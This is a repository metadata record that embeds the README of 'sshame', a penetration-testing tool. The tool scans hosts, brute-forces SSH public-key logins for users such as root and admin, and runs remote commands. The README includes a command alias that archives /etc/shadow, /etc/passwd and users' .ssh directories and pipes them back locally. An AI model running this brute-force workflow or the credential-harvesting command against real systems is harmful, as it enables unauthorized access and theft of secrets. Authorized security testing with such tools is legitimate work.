{"id":13650875,"url":"https://github.com/HynekPetrak/sshame","last_synced_at":"2025-04-22T18:33:02.168Z","repository":{"id":199292074,"uuid":"204323061","full_name":"HynekPetrak/sshame","owner":"HynekPetrak","description":"brute force SSH public-key authentication","archived":false,"fork":false,"pushed_at":"2024-03-24T11:07:35.000Z","size":120,"stargazers_count":70,"open_issues_count":1,"forks_count":14,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-03-24T12:22:47.963Z","etag":null,"topics":["authentication","brute-force","brute-force-attacks","ethical-hacking","penetration-testing","remote-admin-tool","ssh","ssh-key"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HynekPetrak.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2019-08-25T16:50:56.000Z","updated_at":"2024-04-14T19:42:59.826Z","dependencies_parsed_at":null,"dependency_job_id":"929df2db-0a2b-49fc-b43d-79008b5cb99f","html_url":"https://github.com/HynekPetrak/sshame","commit_stats":null,"previous_names":["hynekpetrak/sshame"],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame/manifests","owner_url":"https://repos.ecosyste.ms
/api/v1/hosts/GitHub/owners/HynekPetrak","download_url":"https://codeload.github.com/HynekPetrak/sshame/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223903237,"owners_count":17222500,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["authentication","brute-force","brute-force-attacks","ethical-hacking","penetration-testing","remote-admin-tool","ssh","ssh-key"],"created_at":"2024-08-02T02:00:41.931Z","updated_at":"2024-11-10T01:31:19.368Z","avatar_url":"https://github.com/HynekPetrak.png","language":"Python","funding_links":[],"categories":["Tools"],"sub_categories":[],"readme":"![sshame logo](sshame.png)\n# sshame - brute force SSH public-key authentication\nInteractive tool to brute force ssh public key authentication. Primarily intended for penetration testers. 
Sshame can execute commands on remote hosts.\n\n## Installing ##\n\n### Installing from GitHub ###\n\nClone the source from GitHub:\n\n    git clone https://github.com/HynekPetrak/sshame.git\n    cd sshame\n\nThen, to install, run:\n\n    python -m pip install .\n\nIf you want to contribute rather than just install, run:\n\n    python -m pip install --editable .\n\n### Installing via PyPI ###\n\n`pip3` will install the latest release.\n\n    pip3 install sshame\n\n## Basic usage ##\n\nsshame is interactive, based on https://github.com/python-cmd2/cmd2\n\n    # sshame\n    (sshame)\n\nType help to get a list of commands:\n\n    (sshame) help\n\n    Documented commands (type help \u003ctopic\u003e):\n\n    Sshame\n    ======\n    commands  creds  exploit  hosts  keys  resolve  session\n\n    Uncategorized\n    =============\n    alias  help     macro     py    record        run_script  shell\n    edit   history  playback  quit  run_pyscript  set         shortcuts\n\n\n### Add target hosts ###\n\nIn the sshame shell run `hosts -a list-of-ip-ranges-or-hosts [-p port]`:\n\n    (sshame) hosts -a 10.0.0.0/24 -p 22\n    Scanning 10.0.0.0/24 on port(s) 22\n    ........***.............\n    Received 877 packets, got 222 answers, remaining 34 packets\n    2019-08-25 19:22:15,633 sshame [I] 'Adding host (port open): 10.0.0.2 22'\n    2019-08-25 19:22:15,683 sshame [I] 'Adding host (port open): 10.0.0.1 22'\n    2019-08-25 19:22:15,686 sshame [I] 'Adding host (port open): 10.0.0.6 22'\n\nsshame scans the given hosts with scapy and adds those that have the port open.\n\nTo verify the added hosts with the TCP port open, run `hosts -l`.\n\n### Load ssh keys ###\n\nLoad private keys with `keys -a glob_path [-p list-of-passwords]`:\n\n    (sshame) keys -a test/**/*key\n    2019-08-25 19:30:40,613 sshame [I] \"Adding ssh keys from: ['test/**/*key']\"\n    2019-08-25 19:30:40,614 sshame [I] \"Discovered 4 files in 'test/**/*key'.\"\n    2019-08-25 19:30:40,615 sshame [I] 'Going to 
examine 4 files.'\n    2019-08-25 19:30:40,635 sshame [I] 'Importing ssh-dss key: test/keys/dsa_key'\n    2019-08-25 19:30:40,645 sshame [I] 'Importing ssh-rsa key: test/keys/rsa_key'\n    2019-08-25 19:30:40,680 sshame [I] 'Importing ecdsa-sha2-nistp256 key: test/keys/ecdsa_key'\n    2019-08-25 19:30:40,693 sshame [I] 'Importing ssh-ed25519 key: test/keys/ed25519_key'\n    Loaded 4 unique keys, ignoring 0 duplicates\n\n`-p list-of-passwords` is optional; use it when loading encrypted private keys protected with passwords.\n\nList loaded keys with `keys -l`.\n\n### Test keys on hosts ###\n\nTo brute force which keys authenticate on which targets, run `test_keys -u list-of-users`:\n\n    (sshame) test_keys -u root admin\n    2019-08-25 19:34:31,900 sshame [I] 'Preparing target jobs...'\n    2019-08-25 19:34:31,933 sshame [I] 'Matching keys - 16 jobs scheduled'\n    Completed: [####################] [100.00%]\n    2019-08-25 19:34:56,857 sshame [I] '---------------------------------------------------------------------------'\n\nList matching keys with `creds -l`:\n\n    (sshame) creds -l\n    [1/1/1]: ssh -i test/keys/rsa_key root@10.0.0.2\n    [2/2/1]: ssh -i test/keys/dsa_key admin@10.0.0.1\n\n### Run commands on remote hosts ###\n\nTo run commands on remote hosts, use `run_cmd -c command`, e.g.:\n\n    (sshame) run_cmd -c whoami\n    2019-08-25 23:28:22,757 sshame [I] 'Preparing target jobs...'\n    2019-08-25 23:28:22,763 sshame [I] 'Executing commands - 2 jobs scheduled'\n    Completed: [####################] [100.00%]\n    2019-08-25 23:28:23,993 sshame [I] '---------------------------------------------------------------------------'\n\n### Show command results ###\n\nDisplay the results with `commands -r`:\n\n    (sshame) commands -r\n    Entries: 2\n\n    | guid                                 | host_address   |   host_port | username   | cmd                  |   exit_status | output          | updated             |\n    
|--------------------------------------+----------------+-------------+------------+----------------------+---------------+-----------------+---------------------|\n    | 434f163a-24b5-4775-a3c1-6ea41745b18d | 10.0.0.2       |          22 | root       | whoami               |             0 | root            | 2019-08-25 21:28:23 |\n    | 305e3f5d-bf4d-4024-981a-59b2dddebbcd | 10.0.0.1       |          22 | admin      | whoami               |             0 | admin           | 2019-08-25 21:28:23 |\n\n### Pipe remote commands to a local shell ###\n\nDefine an alias `get_files` for a remote command `tar -cf -  /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0`\n and pipe it to a local `uudecode -o - |tar xzf -`, with:\n\n    commands -a get_files \"tar -cf -  /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0\" -p \"uudecode -o - |tar xzf -\"\n\n`exit 0` is to override tar's exit code in case of missing files.\n\nRun the defined command with:\n\n    run_cmd -c get_files\n\nYou will find the output in the folder `output/\u003chost\u003e_\u003cport\u003e/username/...`\n\n\n### Session management ###\n\nYou may want to split workloads into sessions. Use `session name` to switch between sessions. The default session is \ncalled 'default'.\n\nEach session has its data stored in a separate sqlite db in the current directory named after the session \nname, e.g. `default.db`\n\n    (sshame) session test\n    2019-08-25 23:38:38,283 sshame [I] 'Openning session: sqlite:///test.db'\n\n### License ###\n\nMIT\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fsshame","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHynekPetrak%2Fsshame","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fsshame/lists"}